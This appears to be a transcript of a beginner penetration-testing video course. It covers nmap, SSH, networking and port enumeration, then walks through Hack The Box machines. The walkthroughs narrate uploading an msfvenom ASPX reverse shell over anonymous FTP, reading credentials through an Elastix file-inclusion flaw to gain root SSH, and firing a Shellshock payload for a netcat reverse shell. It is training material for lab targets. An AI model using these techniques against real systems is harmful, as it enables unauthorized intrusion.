so this will go ahead and it'll tell us this is a Windows machine. And so Nmap gives us a lot of information, and this is very basic. 2 ports here. Usually, if you're running against some kind of exam or some more difficult boxes, you will have like 20 ports open, and you will have to enumerate all of them to try and find the vulnerability. And so we're not going to get too much into that now because this is just a overview of Nmap and not actually how to do further enumeration. So one of the things that you will end up doing is, I'm sure this script that I run, you might start out using it in the beginning, but eventually you're going to find your own preference and what works for you. And one of the quick ways to see the different types of things that Nmap can scan for is to type in nmash-help, and you can go ahead and look at all the different flags that are in here, and you can figure out exactly what you like to run. The -sc is really popular. The SV is really popular, and I believe if we scroll down, the -A says it enables OS detection, version detection, script scanning. It does all of those things for us, and so that's why I use the -A. It takes longer, but it saves you from having to type in all these other flags and trying to remember exactly what you want to scan for. So this is the script that I like to run. And if you have any other questions about Nmap, don't be afraid to ask. Nmap's a really helpful tool, and sometimes I will play with different scripts just to see maybe I'll like something different. That's actually how I found the -V. I found that after several tries, I really enjoyed not having to wait because I'm impatient and just being able to go, okay, this port is open, this port is open. And while the scan runs, I can go out and I can be doing other things and finding more information about the target IP address. So with that, that concludes our overview of Nmap, and I'll see you in the next video.
Other way that we're going to see connections is going to be through SSH, and we'll see this when we do more enumeration here in the next few videos. But I wanted to go ahead and cover SSH so that way when we see it in a port scan and we say, look, port 22 is open, there's SSH, you would know what we're talking about. So SSH is when you actually have the credentials necessary for logging into the server, our victim server, remotely. And there's a few ways that we would come across this. Maybe we can use it as a form of privilege escalation or just to get our initial shell. We may come across a text file that has credentials stored in it. Sometimes GitHub files will actually have credentials stored in them on your target web app. If you're going after a web app, sometimes people will hard code their credentials by accident, and you can be pouring through GitHub and find credentials and you can SSH into the machine. It's pretty rare, but it does happen. It's more likely that you will find credentials some other way and you'll be able to SSH into the server and get a shell. So I actually have another machine over here that is open. I just opened port 22 on it and we're going to go ahead and connect to it. So what we'll do is we just type in SSH, and I actually connected to it already, so there is the command. And so you just type in SSH, the host name, which is really important because sometimes the host name will be like Fred, Tom, Tina, whatever the host name is, and then the IP address. And when you hit enter, it's going to prompt you to fingerprint the machine. You'll hit, I think it's Y or yes, and then you'll go ahead and you'll type in the password, and then you'll then have a shell on your attack machine. So we go ahead and type in yes, and then it prompts us for the password, which this is the credentials for the victim machine that we have found. So it would be the password that we found, say, in a text file, and we hit enter, and we now have our shell. You can actually see the terminal itself has changed, and whenever we type in who am I, it's going to tell us Cali because that's the host we just logged into. But that is that's how we SSH into another machine. We're going to cover this more in the coming videos, but when you see the port open in the next few enumeration videos as we do Nmap scans, when we say the port 22 is open, there's SSH, but we need credentials. Now you know what we're talking about. And I will see you in the next video.
Okay, so you want to get into cybersecurity, but you have been told you need to know and understand networking first. Well, that's what we're going to cover in this video. Okay, we're going to be talking about networking for cybersecurity and what you actually need to know in order to break into the world of cybersecurity. Usually, when you start looking into networking and networking for cybersecurity, everything you're going to find is extreme overkill. It's like information that you would need to know if you were going to be a network engineer, and that's just not the case. You don't need to know an insane amount of networking in order to break into the world of cybersecurity. And realistically, there's a very little networking you need to know in order to get certified and get into the certification realm of cybersecurity. So in this video, we're going to be covering what you need to know for networking in the world of cybersecurity, specifically if you're going to be trying to get a job, not working towards any certifications, though this would help, but more specifically, what it is you need to know when you're looking for a job or what you would need to know for a job interview. So with that, the first slide we are covering is networking for cybersecurity. That is the question. That's what we want to know. TCP versus UDP both get packaged up. TCP checks for incoming packets. UDP says ready or not. Here they come. They just send the packets. And why should you care? So this is what we're covering in this slide. The first one, TCP. When you think of a TCP connection, you're going to hear TCP IP all the time, and you're going to see the question, what is TCP IP? You're probably going to get asked in an interview question, what is TCP IP? And so TCP is the transmission control protocol. And so TCP is going to send out a synchronization packet to the server from the client, and then the server will send back a SYN-ACK, so it sends back the synchronization as well as an acknowledgement, and then the client will send back an acknowledgement, and then the communication will begin to flow between the client and the server. And you're going to see this in the future, and you're going to hear it. You're going to have this question come up: what is TCP IP? And so now you know it's the SYN-ACK, it's the SYN-ACK, and the ACK. So it's called the three-way handshake, and you will hear this again. So the UDP, it just has a request, it sends out the request, and it just sends out the response. So what the UDP does is it has information it wants to send, it packages it up, and it just sends it. Some of the packets can get lost. It doesn't really care what the server or the recipient of the information has going on. It just sends the information. So you're going to see TCP quite often. The next slide, TCP. We already talked a little bit about the transmission control protocol, what it is. It's viewed typically as the reliable delivery. When TCP sends data, it always receives the acknowledgement that the data was indeed received. So if some packets get lost, the sender will actually know, okay, some packets was lost. TCP can also handle getting data out of order, and so it can organize the boxes as they show up. I put the picture in here of a mail truck with the packaged up boxes because this is what it's like when data gets sent. It gets packaged up, and then it goes through the network to the recipient. So, and then the boxes are unboxed, and it can handle getting the boxes out of order. So UDP, we talked about this, it's connectionless. It sends data, and it sends it as it's available, not relying on the receiving end. It just sends the data. If there's lost data, then it is lost data. The delivery, the IP delivery sends the data from one IP to another IP. So as you think about, the common analogy for this is a house. Like you have a house and you have different rooms, and you tell one of your children, hey, can you go to this room and get my watch? They have the data, get the watch, and then they have the location, which is the room, and then they go to the room, they get the watch. So when you think of it in the world of cybersecurity, you can think of ports. So we have a image of ports here. The ports are the rooms that are going to be receiving the data. So you would tell the server, like, hey, I want to connect to FTP, and it's gonna ask you for the data and a login, and then it will go to specifically that port on that server, and it will try to communicate. So that's how the delivery system works with the port. And so when you want to connect to a port in TCP, it will go out and see if the port is open before it even tries to connect. Where do the packets go? That is supposed to be, where do the packets go? I have a typo. The packets are sent to their specific ports on the network. Each port has its own assigned function. Ports are not always the same and can be assigned. So each of the ports, you don't want to be trying to send an HTTP request to port 22 because it's just not going to work. So you actually, when you send out the request, it goes to the specific port, which is running specific programs to interpret the data the way that it is supposed to be sent. And so each port has a specific function. In this scan, we have the most common ports that are labeled, but you can actually assign, like HTTP, to port 8081 or 8080 or other ports. You'll see HTTP running on random ports sometimes when you run an Nmap scan. You'll also see things like SSH on port 2222. So you can assign SSH to different ports. They don't always have to be these specific ports, and you will see that in the future. And so we already talked about the mail address a little bit earlier, so we're going to skip that. The SSL, secure sockets layer. SSL is an encrypted connection used between web servers and browsers to protect data privacy. So it tells us exactly how this works. We have this secure socket layer. You're going to see this again. It's going to come up specifically when you encounter a job interview or something of that nature. So this image tells you kind of what happens. The client sends out a request to the server acknowledges it, and then it sends out a session key, and then it encrypts the data as it transfers it back and forth. The OSI model, the Open System Interconnection Model. This is something you are going to need to know, especially when you're going to be going through a job interview. This is definitely going to come up. This is something you'll need to know in order to communicate with blue teamers or the client you just done a penetration test for. So you have, starting at layer 1, the physical, and then 2 is data, 3 is network, 4 is transport, 5 is session, and 6 is the presentation, and 7 is the application. So these are the layers, and you will need to know these layers. I actually pulled up a Wireshark scan here. If you look down where it says frame 205 with that little arrow, that is going to be your layer 1, because it actually tells you what's being sent, and it's being sent this many bytes. I think it's 1484 bytes, and it's being sent on a wire. So that is the physical layer on this Wireshark packet. And then the second is the second layer. You can see the MAC addresses there. On the Ethernet 2, you see both the MAC addresses, so that would be layer 2. And then the internet protocol that is being used, you have the IPs there where the packets are going to be sent with, and so that's the network layer. And then you have 4, which is the transmission control protocol, and you can see the port that is being sent on. And then you have the bottom secure sockets layer, which is going to be layers 5, 6, and 7 all wrapped up together in that one. So when you look at Wireshark, you're going to be able to see exactly how this works. And so if you find a networking problem, you can say, hey, it's on layer 3. And so you'll need to know these layers of the OSI model. So this is something you'll want to commit to memory. So the ARP, or the ARP table, you'll see this a lot. You're going to need to know this when you're going through your certification process, the address resolution protocol. So we see it maps an IP address. I have another typo. You can see it maps an IP address to a physical machine that is on a local network. ARP-A is one that you're going to use when you have access to the Windows machine that you have remote code execution on, and you'll be able to see the ARP table, and you'll be able to see what other machines are running on the specific network and where you can attack next. VLAN, it creates a secure tunnel on a local network to send and receive data. So what is a VLAN? It is a virtual local area network. And so when you see these or hear about a VLAN, it's going to be one specific area of a network where they can communicate. Different client machines or different machines can communicate to one another, and you can have multiple VLANs on a single switch. So that's kind of what these pictures are indicating. And I pulled up one where you have a VLAN 1 and VLAN 2 on a specific switch, where VLAN 1 would communicate specifically to VLAN 1, and VLAN 2 would be within itself. So this is what you're going to need to know on the networking side. There's more to this. Like if you want to know common ports, commit the common ports to memory. So that way when you are attacking a network, you don't have to look around and see what exactly is going on. You'll just automatically know what ports are coming. Those are the only things I think you'll need to know when you come into an interview on getting a job in cybersecurity, specifically in the area of networking for cybersecurity. We are going to begin port enumeration. I decided to go ahead and pull up Hack the Box and get a box running so that we can actually look at ports and walk through some enumeration. So if you would like to follow along as we go through this, you can go ahead and Google Hack the Box and open up the website and go ahead and get a subscription. I believe it's $11 US or $10.99 US. It's really helpful. It's something that will really help you in your journey to becoming a penetration tester. So I would go ahead and suggest you do this. If not, you can follow along. As we do these port enumeration videos, I also would suggest not following along. Like, don't actually write the commands as I write them. Just listen and watch what's going on and try and pick up as much as you can. I'm showing you the port enumeration videos now. And we're going to have lots of time to practice these later as we go through different boxes and different machines. So you can go ahead and just watch these videos, and then later in the course, as we come across these different ports, you can come back to these videos, watch them, and then go and try them yourself on the boxes that we are actually giving to you as challenges to work through. So with that, we'll go ahead and begin port enumeration in the next video. I have decided that we're not actually going to go ahead and enumerate port 80 because a lot of the port enumeration for port 80 we've already done. So what you would do is you would say, okay, this is going to be a web app. So we'd come up to our browser and we would just enter the URL and it takes us to this website, and then from here you know what to do. You'd come in here, you can inspect, you can view page source, you would start up GoBuster, and you basically we've done this and you would know what to do when you come to a port 80. So one other thing that I think might be helpful that we haven't done is when you see port 80, you can often just come over here and you can just copy paste the version of Microsoft that they're running, and you would just paste this, and then you would just type in exploit. It already knows what we're going for, an exploit for Metasploit, and you can go ahead and search for this, and then you can go through and see if there's any exploits that would work if the software is out of date. So I just wanted to give you a real quick, brief overview of port 80 because we've already done a lot of this. Port, it's a lot of web app tricks and hacking. So with that, we're going to go ahead and start our first box on our own and see how far you can get, see if you get stuck. So we'll go ahead and I'll see you in the next video. We see port 53 open. What we should be thinking is what information can we get from this? Usually it'll be something of the sort of names or domain names and IP addresses. And so we're looking to get more information here. And there's a couple of tools that are really helpful here in getting information. And so it really just tells us the domain name server, the DNS, what information can we get here? And so one of the tools that we can run is NSLOOKUP. And to run it, it looks just like this. And we just run it and hit enter. I believe here we don't pull anything back, but that's okay. There's other things that we can run. We can run Nmap and see what we can get from an Nmap scan, but I don't really want to run Nmap right now. Pretty much there's an Nmap scan for just about anything. So if you were like, I want to run an Nmap scan on port 53, you would just open up Google and you could just type in Nmap scan port 53 and you'll find a bunch of different Nmap options for running a scan here. But one of the things I want to go through is the information that we can get from a zone transfer. And so this is, I think, probably the best way to approach this. And so you can just open up a clean terminal here and we just type in DNS Recon, and then we'll type in our -d and our IP address. And I already ran it, so I already have the command. And so we have this open. And so we have these flags, and it's going to go out for us, and it's going to pull the recon for us. And we'll go ahead and run it and see what we are able to pull back. And it says we find nothing. This is actually pretty common for port 53. There's not usually a lot that you will pull back, not a lot of information that you're going to find that you're going to get. And so I actually wanted to show you one more option. This is something you're not going to be able to use in certifications or exams, but I told you we'll go ahead and go through Metasploit, and so we'll just type in msf console, and this will kick up. And then there is also a way to use DNS enumeration here. So what we'll do is we type in use uh, auxiliary and gather enum for DNS, and then we hit enter. And so this is what we're going to be using, and then we type in options to see what is required to run this. And it looks like we just need the domain, so we'll just type in set domain 10.10.10.103 to the IP address, and then you can type in options to make sure it worked, and then you just type in run, and it will go ahead and see what it can find on port 53 for us. And unfortunately, it comes back with nothing. These are a couple of different tools that you can use when you see port 53 open. And yeah, so we'll see this in future videos and future lessons, but here's a few tools for you. So next time we see it, I'll probably challenge you to go ahead and enumerate port 53 all on your own and see what information you can find. And just remember, it's okay to come back and reference videos. I Google stuff all the time. The best point to know is to know that there is something in Metasploit, and so you can actually just Google Metasploit and port 53, or you can go, okay, I know there was a DNS Recon, and you can go ahead and look up DNS Recon on Google, and it will give you the syntax. So with that, take courage, and I'll see you in the next video. We are going to go ahead and enumerate 139 and port 445. These two ports go together. 139, you're going to see NetBIOS running on this port. It is used to communicate between computers within a network. And so when you see port 445 or 139, you can think there's Active Directory and there are ports communicating. And these are enumerated with a couple different tools we're going to see just a second. So the first one that we're going to look at is SMB client. The dash in stands for no authentication, which means we have no username or password, and then the dash L is to list, and it's going to go ahead and list out any users for us that we can see or share names. And when these list out, you're going to see admin. A lot of these are pretty standard, but the one that stands out to me is the department shares. And so there's a couple different ways we can look at what's inside this share folder. You can try and mount the department shares directory, or we can run another tool, which is right here, SMB map. SMB map is going to go ahead and it's going to take the host name, which is our IP address, the user, we're going to log in anonymously, and R stands for recursively, so it's going to go out, it's going to reach into each directory, and it's going to pull out more directories that are in there, and we'll see if we can get back anything interesting. If you go ahead and run this, it is going to take a while because it's going to try a lot of different ways to go into different directories with inside directories. So we'll go ahead and send that now. Okay, so it has come back, and we'll go ahead and scroll through here. We're going to look at the department shares because that was the one that looked interesting, and look to see what came back. It tells us we have read access, we got department shares archive, and then this is one that looks interesting, department shares users, and then a list of users inside the users folder. Now what we would do normally is go ahead and mount the department shares and go into users and see if we can find any more information, but we're not at that point. I was just kind of showing you different ways to look at what information we can gather from these two ports
And so here's kind of what we would do in this case. Now, obviously, we would do a lot more digging and we would spend a significant more time going through everything that we have found. But for now, we're going to go ahead and leave it here, and we'll do more of this in the coming videos.
All right, it is time to talk about some ping sweeping. You are going to be asked in different certification situations how many IP addresses are on a specific network and how many of them are alive, and can you actually get a response back from. Now, there are a couple of ways to do this. If you pretty much look at anything on Google or on YouTube, it's going to tell you to use Nmap, but Nmap is not going to work in some of these situations because some of these live IP addresses may have no open ports, and Nmap is going to do a port scan, which I'm going to show you in just a second through Wireshark. So you're going to want to use Wireshark, and you're going to want to use something called fping to run your ping sweep to see which IPs are actually alive and up on a specific network. So let's go ahead and check this out. Okay, so I've gone ahead and connected to Hack the Box. Up here I have my Hack the Box IP. So now we're going to scan the Hack the Box network and see which hosts are actually online. And you can do this with Nmap, but it's not going to give us all of the live hosts. So if we go ahead and run this, I think it's going to tell us that there are 2 hosts that are online. So we can let this run. It says there are 2 hosts online. We have 161 and Devel, which this box is the one that I'm connected to currently. But another way to check this is to come up to your dropdown and type in Wireshark. And because we are connected to a VPN, we're going to want ton 0. So if we run this Nmap scan again, you're going to start seeing stuff pop up over here inside of Wireshark. And what you're going to notice is when Nmap runs the scan to see if there are a live host, you're going to look and see here's the IP we're scanning, and it's running a send scan to port 80. And then if it gets an acknowledgement back, it'll tell you that the host is alive or the host is up. So it tells us right here the host is up because it had an open port on port 80 for Devel. And I'm not entirely sure about this one. We would have to look to see where that is in Wireshark and look at it. So what we're going to do now is I'm going to show you how to do this in a exam situation where Nmap is not going to be able to pick up all of the hosts for us. What we're going to do is we're going to run fping just like this. So we're going to run it on Devel so you can see what this looks like. And the first thing I want to do is clear my Wireshark. Okay, now that we have a fresh Wireshark, we're going to go ahead and run this, and you'll be able to see how fping works. Fping is going to go out and it's just going to send a ping request, and if we get a reply, it's going to tell us that the host is alive right here. So let's go ahead and check out the fping help pages. So we'll just type in fping-h, and we're going to tell it we want to see which ones are alive. So we're going to run fping-a, and then we'll run our network scan just like this, and then we're going to run it on 24. So if we run this, you're going to be able to see that I think we might need a -G in here like that, and it's going to go ahead and start running these pings for us. We're able to see now that we have other hosts that are popping up as alive that Nmap was not recognizing for us. So you're going to want to run a ping sweep on a network like this if you get asked what networks are alive on a specific network range. And the reason you want to run fping like this is to see which hosts are up, because Nmap is going to look at specific ports, and you can run an Nmap scan that's going to go out and ping every single port on every single IP address for every single possible port, but that's going to take forever. And looking through the Wireshark to see which ones respond is going to be really time consuming, and the easiest way to do it is just to go through this way and to actually like change the length of the response and see if you can get a reply back, which I see we have a replies right here. Oh, those are our local machines. So we see we're getting a reply back from these to our local machine. So you can go through and look at Wireshark. This will be really helpful for you in the certification process. So thanks for watching, and I'll see you in the next video. Okay, in this video, we're going to be talking about FTP, or File Transfer Protocol. This is something you're going to need to know really well in order to pass any kind of certification. You will need to know how to get files off of an FTP server. You're going to need to know how to put files onto an FTP server. And so that's pretty simple. So this video might seem like information overload, but it's really simple to learn and really simple to exploit once you know what you're doing. So you might have to watch this video a time or two and then work through the box Devel once or twice, but it is really simple and you will be really comfortable with it eventually. So if you're new to the world of FTP, just be ready. ready for a kind of an information overload, but it really is pretty simple once you get the hang of it. So I have this little image right here where we are the client and we talk to a server over here through FTP, which is going to be open on port 21. So what we can do is we can send files over to the server and the server will store them. And we can also look and view files on the server and they will send them back. But in order to use FTP, we're going to either have to be able to log in anonymously, or we're going to have some kind of credentials in order to log into the FTP server in order to share these different files. So let's go ahead and check this out. Over here, I have already opened up the box Devel and ran an nmap scan. So we see we have port 80 open and port 21. And just a tip, if you are going for any kind of certification or doing a CTF, you need to, especially for certifications, read every single one of these words that is put out on the nmap scan, because it is really common for different certifications to put something down here like a service or have something running up here, and if you miss it, you will not be able to exploit that specific machine. So you need to be ready to read every single word inside of here, so that way you can Google what you don't understand and look for different exploits. So that was just a little bit of free information. So we have port 21 right here, and it tells us anonymous FTP login allowed, and then it even lists the files for us that are on the FTP server. So what we want to do is check to see if we can get and put files to this FTP right here, and then we want to see if they go onto this web server, so that way we can exploit it. Remembering that maybe we can put files onto the FTP server, but maybe there's no way for us to actually execute the file that is put on the FTP server. Then we're not able to do anything. We can put things on there all day long and we're not able to get a reverse shell. We need some way to be able to execute our file that we put on the FTP server. So first, I want to show you how to get stuff off of the FTP server, and then also see how this can be useful for us, and then how this is going to work in certification scenarios as well as CTFs. So logging into FTP is really simple. We want to make sure we're in the proper location, so desktop box Devel, so that way I know where all my files are being put from, and also going to be downloaded to when I get them off of the server. So logging into FTP is really simple. So we just put in FTP and then the IP address, and because it's anonymous login, we'll just type in anonymous just like this, and we don't even need to put anything in the password. You can just leave it blank and hit enter, and it's going to say user logged in. Now if you find credentials, say through some kind of SMB share, you're going to want to check FTP and see if you can log in, because sometimes you'll have to chain different exploits or vulnerabilities together. So if they have FTP open and you find credentials through an SMB server, then you want to go back and check out FTP and make sure that there's nothing crucial stored inside of FTP, because you might be able to find some files. So in FTP, you can use dir or you can use ls to list. And we want to see this right here. We have this message.txt. I put this here on purpose just for this demonstration. It's not actually a part of the Devel box, but what we want to do whenever we get or put files to or from an FTP server is we want to type in binary, and it'll switch the mode. We'll want to put and get files from binary, because sometimes our exploits won't work if we put a file to the server without switching it to binary. Getting them from the server, it's not such a big deal, but to get it, we just type in get, and then we'll type in message.txt, and it will download to the directory that we have right here, which I have stored over here. So we can go ahead and ls, and we have this message.txt. So what you can do is cat out this message.txt just like this, and it says we will be checking all files manually on this FTP server. Now, the reason I put this in here is because you're gonna see this on some kind of certifications, and you're probably gonna see this for sure in some CTFs. When it says we'll be checking files manually, you have to think there's some kind of program running on the back end of this server that's gonna open up whatever you put on there. And the reason that's a big deal is because if you're on a Windows machine, you can put a Windows reverse shell payload on the FTP server, and maybe every 1 minute, 3 minutes, 5 minutes, there's a program that's going to execute that, and if you're listening on a port, you'll be able to get a shell. You have to be thinking through CTFs, like things like this. So if we put the file on here, and if we see a clue like this and we put a file on here, we'll want to set up a listener and then just wait, or keep doing enumeration and checking other things out on the server. But we want to have a listener going just in case it actually manually runs our code on the back end, or the file that we put on the server, and we get a shell back. So this is something you need to be aware of. You'll see this in SMB, you'll see this sometimes on FTP servers. So you'll want to be ready to read these texts, and if you see anything that says they're going to manually do anything ever, that's a pretty dead giveaway in a CTF or certification that somebody is going to be executing this on the back end, or a program is going to be executing this on the back end. So we'll go ahead and clear this, And I'm going to delete this message.txt from the FTP server because that's not a part of the box. So now if we ls, it should be gone right here. Now, what I want to show you is because our nmap scan shows us we have this port 21 as well as this port 80 open, we want to see if our files that we put on the FTP server shows up on the port 80 or on the web server. So what we'll do is we can just come out here and we can just go 10, 10, 5 like this. So we have this web server and we're going to put a file. So I imagine if we copy this welcome.png and we look at it, we're going to get this image right here. So we want to put a file on this FTP server. So we'll come back over here and I already grabbed a PNG off of my box. So the way you would do this is you can just go locate and we want to locate .png. There's going to be a ton of them and you can just copy one of these to your current location. This is the one that I copied. So I went copy, paste, and then at the front, we want to go to the front and we want to press copy, and then we can go to the end and you can save it as z.png is what I did. So that's how I got this right here. And now what we're going to do is we're going to say put, and we want to put z.png, and that should upload to the FTP server. And if this is connected to the web server, we can come up here, delete this, and type in z.png. And so we see it, and now what we can do is grab a reverse shell in order to put this on the server. So the easiest way to go about this is to just type in msf venom and cheat sheet right here. So we can open this up. We'll hit command find, and we want ASPX, so this one right here. So we'll copy this, and we will put it in our folder. So we'll paste that in, and then we're going to come through here and we're going to change our port to 4444. We're going to change our IP address to the IP address that we have from Hack the Box, and mine is 10.14.2. And we want to delete this interpreter, and we're going to give it shell underscore reverse TCP. So this looks good. We can run it and this will create our payload for us. And now we should be able to come over here as long as we haven't been logged out. We can make sure we're in binary and we can put our reverse shell.aspx. And now it says it's been put. You can actually run an ls. Sometimes when you put stuff and it isn't running in binary, it'll put a 0 right here, and that means it has 0 bytes were put. But since we see some of our information was stored here, we can assume that our payload has been put on here. So now what we want to do is run a netcat listener, just like this. So on port 444, and now we should be able to browse this location. So we should be able to go reverse.aspx, and it looks like it worked for us, and we have a shell back over here. So those are two different ways that you're going to be able to use the FTP server in order to get a reverse shell or pull down some information that is going to be really valuable to you as a penetration tester. This is something you will need to know how to do in order to pass any kind of certification in the future and to be successful in a lot of CTFs. So with that, thanks for watching, and we will move on.
Okay, we're going to be doing a beep from Hack the Box. I've went ahead and connected the VPN and launched the box. I've also ran the nmap scan. I actually ran it twice because it was taking so long. This is how I usually run an nmap scan, but it was going so slow. I went ahead and sped it up with a T4. I think nmap by default runs at a T3. Very rarely will I ever use a T5, only if I'm in a really impatient and I just want some ports to go look at, because T5 will actually miss some ports. So if you do run a T5, I always recommend going back and running a slower version. So we have a few ports here that we should go ahead and look at. Always port 80 right off the bat. And so I actually went ahead and already typed in the IP, and it forwarded us to the port 443. So we're at HTTPS, which is open right here. And so a couple of things that we should do is come here, and one of the first things I always do is look at this. It's running with elastics, so we're going to Google that. But in the meantime, you should also go ahead and run a GoBuster, but GoBuster actually doesn't work on this box, and neither does Derb, and neither does Fuff. So you actually have to, or Derb doesn't run. You have to run a Derbuster. So we go ahead, launch Derbuster,
We can type in, we have our example right here. So we type in HTTP. So that way we have some kind of recon running in the background, put in our IP address, port 80, and then we'll speed it up. We can come in here. We need a word list, and word lists are stored user, share, all the way to the end, back one click, word list, dirbuster, and then we'll go medium. We don't want recursive, and we can start that. And while that is running, we can go ahead and Google Elastic. So I went ahead and Googled the default credentials because this is something you should always try. I would say probably 20% of the time, and I actually tried a couple. When you actually come in here, I would say 20% of the time, default credentials are actually going to end up working. You're going to be able to log in with admin, or whatever the default credentials are that you find on Google. Even in job interview boxes or actual certification situations, default credentials are probably going to work 20% of the time. So it's always worth trying. So in this case, default credentials do not work. So what we'll do is come back over here. You can also run Searchsploit, or you can go and check out Exploit DB. In our case, we're going to run Searchsploit Elastics, and we can see cross-site scripting, not helpful, not helpful, not helpful. We're going to go ahead and check this one out. This one could be helpful, and this one actually could be helpful as well. We're going to do this box two different ways, but first we're going to start right here with this one. There's a couple different ways to copy an exploit to a current working directory. I'm not sure if I actually copied this already or not. I have not. And so one way is to go Searchsploit and then type in -m. And since I have copied it in the past here, it popped up. So you can hit enter. And now if you run ls, there is the exploit right there. So we'll go ahead and read it to see what it says. And we have a local file inclusion, and this is the location. So we can go ahead and copy this. I'm gonna run it just through the browser. No point in running this and seeing what comes back. So we can just copy this, come over here, paste it in, and run it, and you get this mumbo jumbo mess. We see the file is part of FreePBX, but I like to view this a little prettier. So if you go view page source, sometimes this works with JavaScript files as well. You can go view page source and it'll look a lot better. So one of the things I see is FreePBX, and then you come down and keep reading. We see possible user, but then you come down here and it actually tells you you have a DB username, another one, a password, another password, and another user, and it looks like more passwords. So this is a great place to go ahead and start looking at these. There's a couple different ways to run these. We're going to do this manually, and we're going to go ahead and try and SSH into the box using these usernames and passwords. So I'm actually going to shoot for the ones that I know will work, because I think, if I'm remembering right, this box will actually lock you out if you try too many false passwords. So I actually already ran this a little while ago when I was doing the box, and I hit this message, and I wanted you guys to be able to see this. I had never seen this before. So when I ran this SSH, I kept on getting this error. And one of the things you need to get used to doing, and if you're a programmer, you already know this, you copy and you go to Google and you paste, and then you click and then you read to see why you're coming up with this error and what the problem is. I actually didn't see my answer in that one, so I came down to the very next one. I keep going, I read, I was reading, and eventually I found a link. Let's see, I don't remember where I found the link, but I did find the link. And when I did find the link, it said to use this because a newer version of SSH has come out and this box is running an old version. In order to get it to work, you need to run this little flag here in order to get this to work. So if you go ahead and just SSH like you normally would, it is not going to work. So we're going to go ahead and paste this in. We're going to run it. And if this is your first time running SSH on any box, it's going to ask you, are you sure you want to continue? And you're going to type in yes, and then it asks for the password. And this is where our passwords over here come in handy. So it's this one. We'll go ahead and copy. We'll go ahead and paste and hit enter, ID, and we are root. And so that's one way to do this box. There is another way, and we'll go ahead and look at that now. We'll go ahead and exit. We'll go back to our in-map scan. And this is actually an older exploit, but it does come up from now to now, usually from now and again. Usually it only comes up in CTFs. I haven't seen it anywhere other than a CTF, so it's helpful to know, but it's I haven't found it anywhere outside of a CTF. Let's see, where did our Dirbuster go? So when you see the CGI bin, this is something to always think, okay, I should look for this, is shell shock. And so when we come in here, we can see we can try this shell shock on port 80, which actually just forwards us to port 443. I've actually tried it on 443 and it doesn't work. And then we also have another web server right here on port 10,000. I have not hooked up burp to this box, so I'm going to go ahead and do that now, and I'll cut the video and we'll come back and we'll go check out port 10,000. Okay, now that I have burp hooked up, we're back here. We're looking at this port 10,000. You can copy it and come up here and put in port 10,000. And I actually think that might have to be HTTP. I can't remember. Let's look and see what it was. Yep, HTTP. It says this web server is running in SSL mode, and it says try here instead, advance, continue, and we're brought to this page. Now, if you remember, we saw that the server is running the CGI. Where are you? It's running right here. It's running the CGI bin. So what we'll do is go ahead and turn intercept on, refresh this page, send it to repeater. And one of the things that I have done is, rather than memorize what shell shock looks like, I have actually saved it over in my notes. And we'll come over to, we can actually send that on its way, come over to repeater, and we can copy this. We don't need that. And I'll paste in, this is the shell shock code. It just kind of makes the server freak out, and then it runs what is put in after it. So my IP is 1415. And so I'll go ahead and set up a netcat listener. And we'll go netcat dash LV NP 4444. And now it's listening. And when we send this, we should get a response over here. And we do. So that's shell shock. That's a second way to go ahead and do this box. You will see this again in the future. So I decided to append this video just a little bit. I thought maybe you guys would see all of these ports and wonder
why I didn't talk about them. So some of these ports we're going to talk about later. We're definitely going to talk about port 25. We'll talk about these. We might talk about 143 as well. And then a lot of these other ports are not really common ports. So like these are not common ports. MySQL, this is common port, and we're actually going to do some MySQL enumeration later. So I didn't want to overwhelm with trying to enumerate ports and adding information that wasn't really relevant to the box. But one of the things that I would also recommend doing, like if this is your first time coming into an assessment, is to come in here, and one of the things you're going to do is you're going to copy these and you're going to paste them in Google, and you're going to read. You're probably going to copy to see what this is. You can actually just go out and Google and see, what is this port? Is this a common port? And just check those types of things out. And always trying to log into MySQL is helpful. It actually says you have MySQL unauthorized, and so these are things that are helpful to log into to see what's there. Port 22. This is our SSH port, which we did use. It's really, I very rarely, only if I hit a dead end, will I copy this and paste it, the version, and look to see if there's any exploits. SSH is usually locked up tight, and it's really hard to get in. There's not a whole lot you can do with port 25 other than enumeration. Same with these, you just get a lot of enumeration, maybe some usernames. And then, so you can, I usually will come back to these types of ports if I hit dead ends, and I just need more information. And there are some boxes out there where they're going to make you enumerate those ports just to test your enumeration skills. So with that, that's kind of why we didn't cover these ports, and why we just kind of skip through to the main ports, port 80, port 443, and look at the web pages first, which if there's a web page, I always recommend going and checking those out first, because they're the ones with the most attack points. And yeah, so with that, I'll see you in the next video.
All right, we are going to be doing Mirai from Hack the Box, and I've gone ahead and ran the nmap scan already. So the IP address is right here, 10.10.10.48. And so we have quite a few ports here to be looking at. Not a ton, but a few. So we have SSH, which is always nice if we somehow find credentials, and port 53 as well, and port 80. I want to go ahead, and we also have 32400 here, which is running a web server. I want to go ahead and challenge you. We have learned everything necessary to get an initial foothold on this box, and so I want to go ahead and challenge you to do your enumeration and see if you can figure out how to get the initial foothold. I think you can do it, so you can go ahead, pause the video, and give that a try now, or you can go ahead and follow along. So here we go. We're going to go ahead and we're going to look at port 80. So our address is 10.10.10.48, and we have a blank page. We view page source, and there is nothing there. So what we're going to do is we'll go ahead and come over here, and because it's quick, we'll type in 10.10. Whoa. Type in 10.10.10.48, and I always forget that we have to HTTP // and we're going to go ahead and let that run and see if it comes back with anything for us. And in the meantime, and look at this other port here. So this port right here, we can come over here and we can go 10.10.10.48 semicolon, and it was 32,400, I believe. And we have a login page. So if you remember, what do? We go to look and see if we can find this Plex and see if there's any default credentials. So we could come over here and we could go Plex default creds, and we can see
what's here, but also in the meantime, I forgot to mention our derb scan would find this, but you could come over here and type in robots.txt. It has found an admin page. So rather than lead us down this rabbit trail here, we'll go ahead and come back over to this page, to port 80, and we'll type in admin, and we'll see what this brings back for us. Okay, and it finally loaded our page here, and it says we are on Pi-hole, and if you remember, we always go for versions, so we see this version here. We'll go ahead and click log in, and we'll take this version. We'll actually just go Pi-hole, and we'll just look this up just right here, and we can copy this. First thing we do is go default credentials, and then the second thing we'll do is we'll go ahead and see if there's any exploits for this. So one of the things that you can do right here is you can just look at this by adding user. We can look, it says admin can log in with default credentials. We'll go ahead and just open up the Reddit and see what's on here, and then we'll just click our way down, and it says that we can go through and try and read that, or we can go ahead. What does this one say? It says we have the username Pi-hole. How do we find the password? That's a video. How do we log into Pi-hole? And it tells us, so we're going to scroll down a little ways, and we're going to click through, and here it says log in with the default username Pi and the default username password, or the default password Raspberry. So go ahead and come over to our box. We'll just let that run, and you can actually come over here and log in with this, and we'll see if it works. And it doesn't work, but we also saw that port 22 is open, and we'll try to SSH, and you can 